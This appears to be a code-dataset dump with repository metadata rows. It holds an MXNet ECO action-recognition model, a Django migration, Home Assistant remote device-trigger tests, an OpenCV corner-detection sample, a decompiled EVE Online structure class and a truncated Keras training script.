self.conv1 = nn.Conv3D(in_channels=in_channel,channels=out_channel,
kernel_size=(3,3,3),strides=(temporal_stride,spatial_stride,spatial_stride),padding=(1,1,1),
weight_initializer=init.Xavier(rnd_type='gaussian',factor_type='out',magnitude=2),bias_initializer='zero')
self.conv2 = nn.Conv3D(in_channels=out_channel,channels=out_channel,
kernel_size=(3,3,3),strides=(1,1,1),padding=(1,1,1),
weight_initializer=init.Xavier(rnd_type='gaussian',factor_type='out',magnitude=2),bias_initializer='zero')
self.bn1 = nn.BatchNorm(in_channels=out_channel,epsilon=0.001)
self.bn2 = nn.BatchNorm(in_channels=out_channel,epsilon=0.001)
self.relu1 = nn.Activation('relu')
self.relu2 = nn.Activation('relu')
if in_channel != out_channel or spatial_stride != 1 or temporal_stride != 1:
self.down_sample = nn.HybridSequential()
self.down_sample.add(
nn.Conv3D(in_channels=in_channel,channels=out_channel,
kernel_size=1,strides=(temporal_stride,spatial_stride,spatial_stride),
weight_initializer=init.Xavier(rnd_type='gaussian',factor_type='out',magnitude=2)
,use_bias=False),
nn.BatchNorm(in_channels=out_channel,epsilon=0.001)
)
else:
self.down_sample = None
def hybrid_forward(self, F, x):
#residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu1(out)
out = self.conv2(out)
out = self.bn2(out)
if self.down_sample is not None:
x = self.down_sample(x)
return self.relu2(x+out)
#class base_resnet18_v1b(nn.HybridBlock):
# def __init__(self,pretrained=True,batch_normal=True, dropout_ratio=0.8, init_std=0.001,**kwargs):
# super(base_resnet18_v1b, self).__init__()
# self.net = get_model('resnet18_v1b',pretrained=pretrained)
# def hybrid_forward(self, F, x):
# #x = nd.zeros(shape=(1,3,224,224))
# t = self.net.conv1(x)
# t = self.net.bn1(t)
# t = self.net.relu(t)
# t = self.net.maxpool(t)
# t = self.net.layer1(t)
# t = self.net.layer2(t)
# # t.shape (1, 128, 28, 28)
# return t
#
#class base_resnet18_v2(nn.HybridBlock):
# def __init__(self,pretrained=True,batch_normal=True, dropout_ratio=0.8, init_std=0.001,**kwargs):
# super(base_resnet18_v2, self).__init__()
# self.net = get_model('resnet18_v2',pretrained=pretrained)
# def hybrid_forward(self, F, x):
# for i in range(7):
# x = self.net.features[i](x)
# return x
class ECO(nn.HybridBlock):
def __init__(self,nclass,base_model='resnet18_v1b',pretrained_base=True,num_segments=8,num_temporal=1,ifTSN=True,input_channel=3,batch_normal=True, dropout_ratio=0.8, init_std=0.001,**kwargs):
super(ECO, self).__init__()
self.nclass = nclass
self.dropout_ratio=dropout_ratio
self.init_std=init_std
self.num_segments = num_segments
self.ifTSN = ifTSN
self.input_shape = 224
self.base_model = base_model#['resnet18_v1b','resnet18_v2','resnet18_v1b_kinetics400','resnet18_v1b_k400_ucf101'][1]
# resnet50 101 152 的 self.expansion == 4
#self.expansion = 4 if ('resnet50_v1b' in self.base_model)or('resnet101_v1b' in self.base_model)or('resnet152_v1b' in self.base_model) else 1
if 'resnet18_v1b' in self.base_model:
self.expansion = 1
elif 'resnet34_v1b' in self.base_model:
self.expansion = 1
elif 'resnet50_v1b' in self.base_model:
self.expansion = 4
elif 'resnet101_v1b' in self.base_model:
self.expansion = 4
elif 'resnet152_v1b' in self.base_model:
self.expansion = 4
else:
self.expansion = 1
#2d 卷积的出来的维度
self.feat_dim_2d = 128 * self.expansion
# num_temporal 默认为1 论文中 一开始不减少时间维
self.num_temporal = num_temporal
if self.num_segments == 4:
self.num_temporal=1
elif self.num_segments == 8:
self.num_temporal=num_temporal
elif self.num_segments == 16:
self.num_temporal=num_temporal
elif self.num_segments == 32:
self.num_temporal=num_temporal
else:
self.num_temporal=1
# 输入fc的维度
if self.ifTSN == True:
self.feat_dim_3d = 512
else: # Flatten
tmppara = self.num_segments // 4
tmppara = tmppara // (self.num_temporal if tmppara > 1 else 1)
self.feat_dim_3d = 512 * tmppara
pretrained_model = get_model(self.base_model,pretrained=pretrained_base)
with self.name_scope():
# x = nd.zeros(shape=(7x8,3,224,224))
#2D feature
if self.base_model == 'resnet18_v2':
self.feature2d = pretrained_model.features
else: #'resnet18_v1b' in self.base_model:
self.conv1 = pretrained_model.conv1
self.bn1 = pretrained_model.bn1
self.relu = pretrained_model.relu
self.conv1 = pretrained_model.conv1
self.maxpool = pretrained_model.maxpool
self.layer1 = pretrained_model.layer1
self.layer2 = pretrained_model.layer2
#3D feature
self.features_3d = nn.HybridSequential(prefix='')
# conv3_x
self.features_3d.add(BasicBlock(in_channel=self.feat_dim_2d,out_channel=128,spatial_stride=1,temporal_stride=self.num_temporal))
self.features_3d.add(BasicBlock(in_channel=128,out_channel=128,spatial_stride=1,temporal_stride=1))
# conv4_x
self.features_3d.add(BasicBlock(in_channel=128,out_channel=256,spatial_stride=2,temporal_stride=2))
self.features_3d.add(BasicBlock(in_channel=256,out_channel=256,spatial_stride=1,temporal_stride=1))
# conv5_x
self.features_3d.add(BasicBlock(in_channel=256,out_channel=512,spatial_stride=2,temporal_stride=2))
self.features_3d.add(BasicBlock(in_channel=512,out_channel=512,spatial_stride=1,temporal_stride=1))
self.features_3d.add(nn.AvgPool3D(pool_size=(1,7,7)))
self.dropout = nn.Dropout(rate=self.dropout_ratio)
self.output = nn.HybridSequential(prefix='')
if self.ifTSN == True:
self.output.add( nn.Dense(units=self.nclass, in_units=512,
weight_initializer=init.Normal(sigma=self.init_std)) )
else:
self.output.add( nn.Dense(units=512, in_units=self.feat_dim_3d,
weight_initializer=init.Normal(sigma=self.init_std)),
nn.Dense(units=self.nclass, in_units=512,
weight_initializer=init.Normal(sigma=self.init_std)) )
# init
self.features_3d.initialize(init.MSRAPrelu())
self.output.initialize(init.MSRAPrelu())
def hybrid_forward(self, F, x):
#2d
if self.base_model == 'resnet18_v2':
for i in range(7):
x = self.feature2d[i](x)
else: #resnet18_v1b
#x = nd.zeros(shape=(N*numsegment,3,224,224)) N=5 numseg=8
t = self.conv1(x) #conv1: (40, 64, 112, 112)
t = self.bn1(t)
t = self.relu(t)
t = self.maxpool(t)#maxpool: (40, 64, 56, 56)
t = self.layer1(t)#layer1: (40, 64, 56, 56)
x = self.layer2(t)#layer2: (40, 64, 56, 56)
# t.shape (1, 128, 28, 28)
# reshape
x = x.reshape((-1,self.num_segments,self.feat_dim_2d,28,28)) #reshape: (5, 8, 128 * self.expansion, 28, 28)
x = x.transpose(axes=(0,2,1,3,4)) #transpose: (5, 128 * self.expansion, 8, 28, 28)
# 3d
x = self.features_3d(x)
if self.ifTSN == True:
# segmental consensus
x = F.mean(x, axis=2)
else:
x = F.flatten(x)
x = self.output(self.dropout(x))
return x
def eco_resnet18_v2(pretrained=False,
root='~/.mxnet/models', **kwargs):
net = ECO(base_model='resnet18_v2',**kwargs)
if pretrained:
pass
return net
def eco_resnet18_v1b_k400_ucf101(pretrained=False,
root='~/.mxnet/models', **kwargs):
net = ECO(base_model='resnet18_v1b_kinetics400',**kwargs)
if pretrained:
filepath = '0.6349-ucf101-eco_resnet18_v1b_k400_ucf101-068-best.params'
filepath = os.path.join(root,filepath)
filepath = os.path.expanduser(filepath)
net.load_parameters(filepath,allow_missing=True)
print(filepath)
return net
#
def eco_resnet18_v1b_k400(pretrained=False,
root='~/.mxnet/models', **kwargs):
net = ECO(base_model='resnet18_v1b_kinetics400',**kwargs)
if pretrained:
pass
return net
def eco_resnet18_v1b(pretrained=False,
root='~/.mxnet/models', **kwargs):
net = ECO(base_model='resnet18_v1b',**kwargs)
if pretrained:
pass
return net
def eco_resnet34_v1b_k400(pretrained=False,
root='~/.mxnet/models', **kwargs):
net = ECO(base_model='resnet34_v1b_kinetics400',**kwargs)
if pretrained:
pass
return net
def eco_resnet34_v1b(pretrained=False,
root='~/.mxnet/models', **kwargs):
net = ECO(base_model='resnet34_v1b',**kwargs)
if pretrained:
pass
return net
#
def eco_resnet50_v1b_k400(pretrained=False,
root='~/.mxnet/models', **kwargs):
net = ECO(base_model='resnet50_v1b_kinetics400',**kwargs)
if pretrained:
pass
return net
def eco_resnet50_v1b(pretrained=False,
root='~/.mxnet/models', **kwargs):
net = ECO(base_model='resnet50_v1b',**kwargs)
if pretrained:
pass
return net
#
def eco_resnet101_v1b_k400(pretrained=False,
root='~/.mxnet/models', **kwargs):
net = ECO(base_model='resnet101_v1b_kinetics400',**kwargs)
if pretrained:
pass
return net
def eco_resnet101_v1b(pretrained=False,
root='~/.mxnet/models', **kwargs):
net = ECO(base_model='resnet101_v1b',**kwargs)
if pretrained:
pass
return net
#
def eco_resnet152_v1b_k400(pretrained=False,
root='~/.mxnet/models', **kwargs):
net = ECO(base_model='resnet152_v1b_kinetics400',**kwargs)
if pretrained:
pass
return net
def eco_resnet152_v1b(pretrained=False,
root='~/.mxnet/models', **kwargs):
net = ECO(base_model='resnet152_v1b',**kwargs)
if pretrained:
pass
return net
| [
"rovingthrough@163.com"
] | rovingthrough@163.com |
11513db9ae5b8be93cda1263ff6f7d9256a10e47 | 6f96f722aaca40e75e17a7e1e728d5cb8fc1a9df | /mysite/Mysite/migrations/0010_auto_20200212_1216.py | 73eda94639637a831bbe6ab1345cee255f0b3101 | [] | no_license | sathiyasangar/Django_crud | cbe83a9c8b185adb4286f2fa83244e7712dee621 | 042362ab5fd0edae7d505dcdc9cd2539f470220e | refs/heads/master | 2020-12-28T04:01:56.408080 | 2020-02-17T07:24:28 | 2020-02-17T07:24:28 | 238,173,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | # Generated by Django 3.0.3 on 2020-02-12 12:16
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Mysite', '0009_auto_20200212_1215'),
]
operations = [
migrations.RemoveField(
model_name='regis',
name='created_at',
),
migrations.RemoveField(
model_name='regis',
name='updated_at',
),
]
| [
"sathiyasangar@gmail.com"
] | sathiyasangar@gmail.com |
01ef88728bf02ea3ad9fac6b0c5c4f64a492c30a | 96dcea595e7c16cec07b3f649afd65f3660a0bad | /tests/components/remote/test_device_trigger.py | b5dcca3dc4c9f2fe772eca66fdec608d73ab918b | [
"Apache-2.0"
] | permissive | home-assistant/core | 3455eac2e9d925c92d30178643b1aaccf3a6484f | 80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743 | refs/heads/dev | 2023-08-31T15:41:06.299469 | 2023-08-31T14:50:53 | 2023-08-31T14:50:53 | 12,888,993 | 35,501 | 20,617 | Apache-2.0 | 2023-09-14T21:50:15 | 2013-09-17T07:29:48 | Python | UTF-8 | Python | false | false | 13,958 | py | """The test for remote device automation."""
from datetime import timedelta
import pytest
from pytest_unordered import unordered
import homeassistant.components.automation as automation
from homeassistant.components.device_automation import DeviceAutomationType
from homeassistant.components.remote import DOMAIN
from homeassistant.const import STATE_OFF, STATE_ON, EntityCategory
from homeassistant.core import HomeAssistant
from homeassistant.helpers import device_registry as dr, entity_registry as er
from homeassistant.helpers.entity_registry import RegistryEntryHider
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.common import (
MockConfigEntry,
async_fire_time_changed,
async_get_device_automation_capabilities,
async_get_device_automations,
async_mock_service,
)
@pytest.fixture(autouse=True, name="stub_blueprint_populate")
def stub_blueprint_populate_autouse(stub_blueprint_populate: None) -> None:
"""Stub copying the blueprints to the config folder."""
@pytest.fixture
def calls(hass):
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
async def test_get_triggers(
hass: HomeAssistant,
device_registry: dr.DeviceRegistry,
entity_registry: er.EntityRegistry,
) -> None:
"""Test we get the expected triggers from a remote."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_entry = entity_registry.async_get_or_create(
DOMAIN, "test", "5678", device_id=device_entry.id
)
expected_triggers = [
{
"platform": "device",
"domain": DOMAIN,
"type": trigger,
"device_id": device_entry.id,
"entity_id": entity_entry.id,
"metadata": {"secondary": False},
}
for trigger in ["changed_states", "turned_off", "turned_on"]
]
triggers = await async_get_device_automations(
hass, DeviceAutomationType.TRIGGER, device_entry.id
)
assert triggers == unordered(expected_triggers)
@pytest.mark.parametrize(
("hidden_by", "entity_category"),
(
(RegistryEntryHider.INTEGRATION, None),
(RegistryEntryHider.USER, None),
(None, EntityCategory.CONFIG),
(None, EntityCategory.DIAGNOSTIC),
),
)
async def test_get_triggers_hidden_auxiliary(
hass: HomeAssistant,
device_registry: dr.DeviceRegistry,
entity_registry: er.EntityRegistry,
hidden_by,
entity_category,
) -> None:
"""Test we get the expected triggers from a hidden or auxiliary entity."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_entry = entity_registry.async_get_or_create(
DOMAIN,
"test",
"5678",
device_id=device_entry.id,
entity_category=entity_category,
hidden_by=hidden_by,
)
expected_triggers = [
{
"platform": "device",
"domain": DOMAIN,
"type": trigger,
"device_id": device_entry.id,
"entity_id": entity_entry.id,
"metadata": {"secondary": True},
}
for trigger in ["changed_states", "turned_off", "turned_on"]
]
triggers = await async_get_device_automations(
hass, DeviceAutomationType.TRIGGER, device_entry.id
)
assert triggers == unordered(expected_triggers)
async def test_get_trigger_capabilities(
hass: HomeAssistant,
device_registry: dr.DeviceRegistry,
entity_registry: er.EntityRegistry,
) -> None:
"""Test we get the expected capabilities from a remote trigger."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_registry.async_get_or_create(
DOMAIN, "test", "5678", device_id=device_entry.id
)
expected_capabilities = {
"extra_fields": [
{"name": "for", "optional": True, "type": "positive_time_period_dict"}
]
}
triggers = await async_get_device_automations(
hass, DeviceAutomationType.TRIGGER, device_entry.id
)
for trigger in triggers:
capabilities = await async_get_device_automation_capabilities(
hass, DeviceAutomationType.TRIGGER, trigger
)
assert capabilities == expected_capabilities
async def test_get_trigger_capabilities_legacy(
hass: HomeAssistant,
device_registry: dr.DeviceRegistry,
entity_registry: er.EntityRegistry,
) -> None:
"""Test we get the expected capabilities from a remote trigger."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_registry.async_get_or_create(
DOMAIN, "test", "5678", device_id=device_entry.id
)
expected_capabilities = {
"extra_fields": [
{"name": "for", "optional": True, "type": "positive_time_period_dict"}
]
}
triggers = await async_get_device_automations(
hass, DeviceAutomationType.TRIGGER, device_entry.id
)
for trigger in triggers:
trigger["entity_id"] = entity_registry.async_get(trigger["entity_id"]).entity_id
capabilities = await async_get_device_automation_capabilities(
hass, DeviceAutomationType.TRIGGER, trigger
)
assert capabilities == expected_capabilities
async def test_if_fires_on_state_change(
hass: HomeAssistant,
entity_registry: er.EntityRegistry,
calls,
enable_custom_integrations: None,
) -> None:
"""Test for turn_on and turn_off triggers firing."""
entry = entity_registry.async_get_or_create(DOMAIN, "test", "5678")
hass.states.async_set(entry.entity_id, STATE_ON)
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.id,
"type": "turned_on",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_on {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
},
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.id,
"type": "turned_off",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_off {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
},
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.id,
"type": "changed_states",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_on_or_off {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
},
]
},
)
assert len(calls) == 0
hass.states.async_set(entry.entity_id, STATE_OFF)
await hass.async_block_till_done()
assert len(calls) == 2
assert {calls[0].data["some"], calls[1].data["some"]} == {
f"turn_off device - {entry.entity_id} - on - off - None",
f"turn_on_or_off device - {entry.entity_id} - on - off - None",
}
hass.states.async_set(entry.entity_id, STATE_ON)
await hass.async_block_till_done()
assert len(calls) == 4
assert {calls[2].data["some"], calls[3].data["some"]} == {
f"turn_on device - {entry.entity_id} - off - on - None",
f"turn_on_or_off device - {entry.entity_id} - off - on - None",
}
async def test_if_fires_on_state_change_legacy(
hass: HomeAssistant,
entity_registry: er.EntityRegistry,
calls,
enable_custom_integrations: None,
) -> None:
"""Test for turn_on and turn_off triggers firing."""
entry = entity_registry.async_get_or_create(DOMAIN, "test", "5678")
hass.states.async_set(entry.entity_id, STATE_ON)
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.entity_id,
"type": "turned_off",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_off {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
},
]
},
)
assert len(calls) == 0
hass.states.async_set(entry.entity_id, STATE_OFF)
await hass.async_block_till_done()
assert len(calls) == 1
assert (
calls[0].data["some"]
== f"turn_off device - {entry.entity_id} - on - off - None"
)
async def test_if_fires_on_state_change_with_for(
hass: HomeAssistant,
entity_registry: er.EntityRegistry,
calls,
enable_custom_integrations: None,
) -> None:
"""Test for triggers firing with delay."""
entry = entity_registry.async_get_or_create(DOMAIN, "test", "5678")
hass.states.async_set(entry.entity_id, STATE_ON)
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.id,
"type": "turned_off",
"for": {"seconds": 5},
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_off {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
}
]
},
)
await hass.async_block_till_done()
assert len(calls) == 0
hass.states.async_set(entry.entity_id, STATE_OFF)
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
await hass.async_block_till_done()
assert (
calls[0].data["some"]
== f"turn_off device - {entry.entity_id} - on - off - 0:00:05"
)
| [
"noreply@github.com"
] | home-assistant.noreply@github.com |
7e5bcff3d846d769cf3f7b62e1922fdc11bb5a71 | a11dc2b1cf9247f38c19c44acd48609f01a9cdd6 | /sampleprogram/01/01-02.py | 8fa1bcadc0cb8649b11d11b7dec52f48eba6dc72 | [] | no_license | churabou/opencv_book_sample | f04b50e1c8c2a0df136c34dc44de4508fdc8d6bc | 33f742c4d10d82633c28e08114640b91a467de45 | refs/heads/master | 2021-08-30T18:59:39.778260 | 2017-12-19T02:46:32 | 2017-12-19T02:46:32 | 114,711,044 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | import cv2
img_src = cv2.imread('01-06.jpg', 1)
img_gray = cv2.cvtColor(img_src, cv2.COLOR_BGR2GRAY)
img_dst = img_src.copy()
corners = cv2.goodFeaturesToTrack(img_gray, 1000, 0.1, 5)
for i in corners:
x,y = i.ravel()
cv2.circle(img_dst, (x,y), 3, (0, 0, 255), 2)
cv2.imshow('src', img_src)
cv2.imshow('dst', img_dst)
cv2.waitKey(0)
cv2.destroyAllWindows()
| [
""
] | |
810e8fc904dfdccceb4282cca5aa2a50ec0181a8 | 5864e86954a221d52d4fa83a607c71bacf201c5a | /eve/client/script/environment/spaceObject/structure.py | 88fcfaaef3632e06940848939a4cc0691a53f89d | [] | no_license | connoryang/1v1dec | e9a2303a01e5a26bf14159112b112be81a6560fd | 404f2cebf13b311e754d45206008918881496370 | refs/heads/master | 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,417 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\environment\spaceObject\structure.py
import blue
import uthread
import structures
import evetypes
import logging
from eve.client.script.environment.spaceObject.buildableStructure import BuildableStructure
from eve.client.script.environment.model.turretSet import TurretSet
from evegraphics.explosions.spaceObjectExplosionManager import SpaceObjectExplosionManager
STATE_CONSTRUCT = 'construct'
STATE_VULNERABLE = 'vulnerable'
STATE_INVULNERABLE = 'invulnerable'
STATE_SIEGED = 'sieged'
STATE_DECONSTRUCT = 'deconstruct'
STATES = {structures.STATE_UNKNOWN: STATE_INVULNERABLE,
structures.STATE_UNANCHORED: STATE_DECONSTRUCT,
structures.STATE_ANCHORING: STATE_CONSTRUCT,
structures.STATE_ONLINE: STATE_INVULNERABLE,
structures.STATE_SHIELD_VULNERABLE: STATE_VULNERABLE,
structures.STATE_SHIELD_REINFORCE: STATE_SIEGED,
structures.STATE_ARMOR_VULNERABLE: STATE_VULNERABLE,
structures.STATE_ARMOR_REINFORCE: STATE_SIEGED,
structures.STATE_HULL_VULNERABLE: STATE_VULNERABLE}
class Structure(BuildableStructure):
__unloadable__ = True
def __init__(self):
BuildableStructure.__init__(self)
self.Init()
def Release(self):
BuildableStructure.Release(self)
self.Init()
def Init(self):
self.fitted = False
self.state = None
self.timer = None
self.turrets = []
self.modules = {}
def Assemble(self):
self.SetStaticRotation()
self.SetupSharedAmbientAudio()
self.OnSlimItemUpdated(self.typeData.get('slimItem'))
def OnSlimItemUpdated(self, item):
if item is None or self.unloaded:
return
if item.state and (item.state != self.state or item.timer != self.timer):
if item.timer and item.state == structures.STATE_ANCHORING:
start, end, paused = item.timer
duration = (end - start) / const.SEC
elapsed = duration - max(end - blue.os.GetWallclockTime(), 0L) / const.SEC
else:
duration = 0
elapsed = 0
self.state = item.state
self.timer = item.timer
self.GotoState(STATES[self.state], duration, elapsed)
if set([ i[0] for i in item.modules or [] if evetypes.GetGraphicID(i[1]) is not None ]) != set(self.modules.keys()):
uthread.new(self.ReloadHardpoints)
def OnDamageState(self, damageState):
BuildableStructure.OnDamageState(self, damageState)
if self.model is not None and damageState is not None:
states = [ (d if d is not None else 0.0) for d in damageState ]
self.model.SetImpactDamageState(states[0], states[1], states[2], False)
def GotoState(self, state, totalTime = 0, elapsedTime = 0):
if state == STATE_CONSTRUCT:
uthread.new(self.BuildStructure, float(totalTime), float(elapsedTime))
elif state == STATE_DECONSTRUCT:
uthread.new(self.TearDownStructure, float(totalTime), float(elapsedTime))
else:
uthread.new(self.LoadModelWithState, state)
def LoadModelWithState(self, newState):
if self.model is None:
self.LoadModel()
self.TriggerAnimation(newState)
self.FitHardpoints()
self.StartStructureLoopAnimation()
def LoadModel(self, fileName = None, loadedModel = None):
self.model = self.GetStructureModel()
self.SetAnimationSequencer(self.model)
self.NotifyModelLoaded()
def ReloadHardpoints(self):
self.UnfitHardpoints()
self.FitHardpoints()
def UnfitHardpoints(self):
if not self.fitted:
return
self.logger.debug('Unfitting hardpoints')
newModules = {}
for key, val in self.modules.iteritems():
if val not in self.turrets:
newModules[key] = val
self.modules = newModules
del self.turrets[:]
self.fitted = False
def FitHardpoints(self, blocking = False):
if self.fitted:
return
if self.model is None:
self.logger.warning('FitHardpoints - No model')
return
self.logger.debug('Fitting hardpoints')
self.fitted = True
newTurretSetDict = TurretSet.FitTurrets(self.id, self.model, self.typeData.get('sofFactionName', None))
self.turrets = []
for key, val in newTurretSetDict.iteritems():
self.modules[key] = val
self.turrets.append(val)
def LookAtMe(self):
if not self.model:
return
if not self.fitted:
self.FitHardpoints()
def StopStructureLoopAnimation(self):
animationUpdater = self.GetStructureModel().animationUpdater
if animationUpdater is not None:
animationUpdater.PlayLayerAnimation('TrackMaskLayer1', 'Layer1Loop', False, 1, 0, 1, True)
def StartStructureLoopAnimation(self):
animationUpdater = self.GetStructureModel().animationUpdater
if animationUpdater is not None:
animationUpdater.PlayLayerAnimation('TrackMaskLayer1', 'Layer1Loop', False, 0, 0, 1, True)
def BuildStructure(self, anchoringTime, elapsedTime):
self.LoadUnLoadedModels()
self.logger.debug('Structure: BuildStructure %s', self.GetTypeID())
self.PreBuildingSteps()
delay = int((anchoringTime - elapsedTime) * 1000)
uthread.new(self._EndStructureBuild, delay)
self.TriggerAnimation(STATE_CONSTRUCT, curveLength=anchoringTime, elapsedTime=elapsedTime)
def _EndStructureBuild(self, delay):
blue.pyos.synchro.SleepSim(delay)
if self.released or self.exploded:
return
self.StartStructureLoopAnimation()
self.PostBuildingSteps(True)
self.LoadModel()
def TearDownStructure(self, unanchoringTime, elapsedTime):
self.LoadUnLoadedModels()
self.logger.debug('Structure: TearDownStructure %s', self.GetTypeID())
self.StopStructureLoopAnimation()
self.PreBuildingSteps()
delay = int((unanchoringTime - elapsedTime) * 1000)
uthread.new(self._EndStructureTearDown, delay)
self.TriggerAnimation(STATE_DECONSTRUCT, curveLength=unanchoringTime, elapsedTime=elapsedTime)
def _EndStructureTearDown(self, delay):
blue.pyos.synchro.SleepSim(delay)
if self.released or self.exploded:
return
self.PostBuildingSteps(False)
self.model = self.GetNanoContainerModel()
def Explode(self, explosionURL = None, scaling = 1.0, managed = False, delay = 0.0):
if SpaceObjectExplosionManager.USE_EXPLOSION_BUCKETS:
self.logger.debug('Exploding with explosion bucket')
scene = sm.GetService('space').GetScene()
wreckSwitchTime, _, __ = SpaceObjectExplosionManager.ExplodeBucketForBall(self, scene)
return wreckSwitchTime
explosionURL, (delay, _) = self.GetExplosionInfo()
explosionLocatorSets = None
if hasattr(self.model, 'locatorSets'):
explosionLocatorSets = self.model.locatorSets.FindByName('explosions')
rotation = self.GetStaticRotation()
self.explosionManager.PlayClientSideExplosionBall(explosionURL, (self.x, self.y, self.z), rotation, explosionLocatorSets)
return delay
| [
"le02005@163.com"
] | le02005@163.com |
ee057d853429be5c3457c783108df7d6c1a9aee6 | 29ae5c73f2e94d406aa814a946863e48d559ac87 | /Model training/SNNTrainingScript.py | 2bb029b732d2e69902ea5789e3c489a6df3e65b5 | [] | no_license | Zhi-Yih-Lim/DOB-Scan_Probe | 28884221759129a951f93b691085aeecc242a101 | 7676e2d8e0525792f5854a37ae695b0eaaccc35a | refs/heads/main | 2023-05-02T18:59:55.661889 | 2021-05-28T08:15:00 | 2021-05-28T08:15:00 | 371,195,126 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,742 | py | import numpy as np
import os
from ConstructTrainNTarget4Training import TrainNTargetValues # Module that divides the training data from .csv format to input and target values
from SNN import SingleLayerNeuralNet # Module that returns a "model" object from keras, to be used for model training (single layered neural network in this case)
from SNNTwoLayer import DoubleLayerNeuralNet # Module that returns a "model" object from keras, to be used for model training (double layered neural network in this case)
from sklearn.model_selection import train_test_split
import tensorflow as tf
import keras
from keras import backend as K
def TrainSNN(TrainingParam):
# Calculate the pixel shift
pxlShift = TrainingParam["InputPerSection"]-TrainingParam["OverlappingPixels"]
# Calculate the total number of sections
ttlSection = int((128-TrainingParam["OverlappingPixels"])//pxlShift)
# Instantiate an array to store the minimum validation error for each section, for the current model input settings
sectErr = np.zeros((1,ttlSection))
# Train each section
for section in range(ttlSection):
if section <= int(ttlSection//2): ################################ Change here for section numbers corresponding to different LEDs #################################################
# Construct the input and target values for the current section
i690Train,i690Target = TrainNTargetValues(section,pxlShift,TrainingParam["InputPerSection"],TrainingParam["Path2i690TrainingData"])
# Split the data into training and validation
X_train,X_valid,Y_train,Y_valid = train_test_split(i690Train,i690Target,test_size=0.05,random_state=3)
# Construct file path to folder specifying the type of loss function used when training
pat2TypeOfLossFunc = TrainingParam["Path2SaveWeights"] + "\\{}".format(TrainingParam["Loss"])
# Create the folder if it has not been previously created
if not os.path.exists(pat2TypeOfLossFunc):
os.makedirs(pat2TypeOfLossFunc)
# Construct file path to folder specifying the type of activation used for training
pat2ActivationType = pat2TypeOfLossFunc + "\\{}".format(TrainingParam["ActivationDisp"])
# Create the folder if it has not been previously created
if not os.path.exists(pat2ActivationType):
os.makedirs(pat2ActivationType)
# Construct the file path to the folder of the current number of pixels per section
pat2NumberOfInputPxl = pat2ActivationType + "\\{} Input".format(TrainingParam["InputPerSection"])
# Create the folder if it has not been previously created
if not os.path.exists(pat2NumberOfInputPxl):
os.makedirs(pat2NumberOfInputPxl)
# Construct the file path to the folder of the current number of overlapping pixels in between sections
pat2NumberOfOverlap = pat2NumberOfInputPxl + "\\{} Overlap".format(TrainingParam["OverlappingPixels"])
# Create the folder if it has not been previously created
if not os.path.exists(pat2NumberOfOverlap):
os.makedirs(pat2NumberOfOverlap)
# Create a temporary SNN model for training
if TrainingParam["SecondLayerHiddenUnits"] == 0:
# Path to folder for different layers of hidden units
pat2LayerOfHiddenUnits = pat2NumberOfOverlap + "\\OneHidden"
# Create the folder if it has not been previously created
if not os.path.exists(pat2LayerOfHiddenUnits):
os.makedirs(pat2LayerOfHiddenUnits)
# Path to folder containing the number of hidden units
